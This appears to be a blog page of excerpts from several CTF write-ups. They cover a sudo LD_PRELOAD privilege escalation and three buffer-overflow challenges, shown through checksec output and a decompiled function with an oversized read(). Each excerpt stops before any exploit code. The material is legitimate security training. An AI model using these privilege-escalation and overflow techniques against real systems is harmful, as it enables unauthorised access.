Writeup Cyber Threat Force : PrivEsc
For this challenge, we were given SSH access to a machine, as the user ctf. After running sudo -l, we quickly find that we can run the /opt/Ivazov binary as ctf_cracked. The user in question has a flag.txt file in their home, which only they can read.
We also notice env_keep += LD_PRELOAD. From there, we can try an LD_PRELOAD exploit. The steps taken here are copied from the guide was was just linked.
Writeup Cyber Threat Force : bof_3
For this challenge, we also were given a service executable. It was hosted remotely.
NOTE: since I’m writting this after the CTF ended, the demos are done locally.
$ checksec ./service [*] '/home/vivescere/ctf/bof_3/service' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) $ ./service password: mypassword nop NX enabled, and partial RELRO. Let’s take a look at the binary using Ghidra:
undefined4 main(void) { ignorMe(&stack0x00000004); puts("password: "); vuln(); puts("nop"); return 0; } void vuln(void) { undefined local_70 [104]; read(0,local_70,0x96); return; } We have an overflow, but not much else going on.
Writeup Cyber Threat Force : bof_2 (with PrivEsc)
For this challenge, we were also given a service executable. It was also hosted remotely.
NOTE: since I’m writting this after the CTF ended, the demos are done locally.
Level 1 $ checksec service [*] '/home/vivescere/ctf/bof_2/service' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: PIE enabled RWX: Has RWX segments $ ./service Hello authentifie toi ! Username: vivescere Bienvenue vivescere password: mypassword oops i have lost my db sorry This time, the only protection that’s activated is PIE, which means addresses won’t be stable.
Writeup Cyber Threat Force : bof_1 (with GetShell & PrivEsc)
For this challenge, we were given a service executable. It was also hosted remotely.
NOTE: since I’m writting this after the CTF ended, the demos are done locally.
Level 1 $ checksec service [*] '/home/vivescere/ctf/bof_1/service' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) $ ./service hello who are you? vivescere Hello vivescere We do have NX enabled, along with canaries and partial RELRO. Also, the executable is statically linked, meaning we won’t have access to the libc easily.